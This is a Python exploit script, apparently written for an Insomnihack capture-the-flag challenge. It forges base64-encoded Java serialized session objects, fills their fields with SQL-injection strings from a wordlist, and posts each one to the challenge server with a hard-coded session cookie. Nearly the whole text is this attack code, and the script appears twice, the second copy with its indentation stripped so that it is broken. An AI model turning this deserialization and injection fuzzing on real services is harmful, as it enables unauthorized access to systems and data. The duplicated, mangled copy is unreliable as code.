SakiiR/exploit.py

## exploit.py
#!/usr/bin/env python
# @SakiiR

from struct import pack
import requests
import base64

"""
00000000: aced 0005 7372 000a 5765 6253 6573 7369  ....sr..WebSessi
00000010: 6f6e 0000 0000 0000 0001 0200 044c 000c  on...........L..
00000020: 6d5f 6236 3450 6179 6c6f 6164 7400 124c  m_b64Payloadt..L
00000030: 6a61 7661 2f6c 616e 672f 5374 7269 6e67  java/lang/String
00000040: 3b4c 0007 6d5f 6c6f 6769 6e71 007e 0001  ;L..m_loginq.~..
00000050: 4c00 0a6d 5f70 6173 7377 6f72 6471 007e  L..m_passwordq.~
00000060: 0001 4c00 0b6d 5f73 6573 7369 6f6e 4944  ..L..m_sessionID
00000070: 7100 7e00 0178 7074 0000 7400 0561 646d  q.~..xpt..t..adm
00000080: 696e 7400 1549 206c 6f76 6520 7069 6e6b  int..I love pink
00000090: 2070 6f6e 6965 7320 3c33 7400 0234 32     ponies <3t..42
"""

PROXIES = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
PINKY = "f516c240ce6b4ea785ffd3c9a816fb42"


def do(p):
    return requests.post(
        "https://defiltrate.insomnihack.ch/",
        verify=False,
        proxies=PROXIES,
        headers={
            "Cookie": "PINKYID={}".format(PINKY),
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
        },
        data={"VIEW": p, "get": "./malware_activity.pcapng", "rm": ""},
        allow_redirects=False,
    )


def payload(username, password, session_id, b64payload):
    def sz(txt):
        return pack(">i", len(txt))[2:4] + txt

    return base64.b64encode(
        b"\xac\xed\x00\x05\x73\x72\x00\x0a\x57\x65\x62\x53\x65\x73\x73\x69"
        b"\x6f\x6e\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x4c\x00\x0c"
        b"\x6d\x5f\x62\x36\x34\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x12\x4c"
        b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67"
        b"\x3b\x4c\x00\x07\x6d\x5f\x6c\x6f\x67\x69\x6e\x71\x00\x7e\x00\x01"
        b"\x4c\x00\x0a\x6d\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x71\x00\x7e"
        b"\x00\x01\x4c\x00\x0b\x6d\x5f\x73\x65\x73\x73\x69\x6f\x6e\x49\x44"
        b"\x71\x00\x7e\x00\x01\x78\x70\x74"
        + sz(b64payload)
        + "\x74"
        + sz(username)
        + b"\x74"
        + sz(password)
        + b"\x74"
        + sz(session_id)
    )


def main():
    with open(
        "/home/sakiir/workspace/wordlists/SecLists/Fuzzing/SQLi/Generic-SQLi.txt",
        "rb",
    ) as f:
        lines = f.read().splitlines()
        for line in lines:
            print(line)
            p = payload(line, line, line, line)
            r = do(p)
            if r.status_code != 301:
                print("lol !")
                return


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# @SakiiR

	from struct import pack
	import requests
	import base64

	"""
	00000000: aced 0005 7372 000a 5765 6253 6573 7369 ....sr..WebSessi
	00000010: 6f6e 0000 0000 0000 0001 0200 044c 000c on...........L..
	00000020: 6d5f 6236 3450 6179 6c6f 6164 7400 124c m_b64Payloadt..L
	00000030: 6a61 7661 2f6c 616e 672f 5374 7269 6e67 java/lang/String
	00000040: 3b4c 0007 6d5f 6c6f 6769 6e71 007e 0001 ;L..m_loginq.~..
	00000050: 4c00 0a6d 5f70 6173 7377 6f72 6471 007e L..m_passwordq.~
	00000060: 0001 4c00 0b6d 5f73 6573 7369 6f6e 4944 ..L..m_sessionID
	00000070: 7100 7e00 0178 7074 0000 7400 0561 646d q.~..xpt..t..adm
	00000080: 696e 7400 1549 206c 6f76 6520 7069 6e6b int..I love pink
	00000090: 2070 6f6e 6965 7320 3c33 7400 0234 32 ponies <3t..42
	"""

	PROXIES = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
	PINKY = "f516c240ce6b4ea785ffd3c9a816fb42"


	def do(p):
	return requests.post(
	"https://defiltrate.insomnihack.ch/",
	verify=False,
	proxies=PROXIES,
	headers={
	"Cookie": "PINKYID={}".format(PINKY),
	"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8",
	"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
	"Accept-Encoding": "gzip, deflate",
	},
	data={"VIEW": p, "get": "./malware_activity.pcapng", "rm": ""},
	allow_redirects=False,
	)


	def payload(username, password, session_id, b64payload):
	def sz(txt):
	return pack(">i", len(txt))[2:4] + txt

	return base64.b64encode(
	b"\xac\xed\x00\x05\x73\x72\x00\x0a\x57\x65\x62\x53\x65\x73\x73\x69"
	b"\x6f\x6e\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x4c\x00\x0c"
	b"\x6d\x5f\x62\x36\x34\x50\x61\x79\x6c\x6f\x61\x64\x74\x00\x12\x4c"
	b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67"
	b"\x3b\x4c\x00\x07\x6d\x5f\x6c\x6f\x67\x69\x6e\x71\x00\x7e\x00\x01"
	b"\x4c\x00\x0a\x6d\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x71\x00\x7e"
	b"\x00\x01\x4c\x00\x0b\x6d\x5f\x73\x65\x73\x73\x69\x6f\x6e\x49\x44"
	b"\x71\x00\x7e\x00\x01\x78\x70\x74"
	+ sz(b64payload)
	+ "\x74"
	+ sz(username)
	+ b"\x74"
	+ sz(password)
	+ b"\x74"
	+ sz(session_id)
	)


	def main():
	with open(
	"/home/sakiir/workspace/wordlists/SecLists/Fuzzing/SQLi/Generic-SQLi.txt",
	"rb",
	) as f:
	lines = f.read().splitlines()
	for line in lines:
	print(line)
	p = payload(line, line, line, line)
	r = do(p)
	if r.status_code != 301:
	print("lol !")
	return


	if __name__ == "__main__":
	main()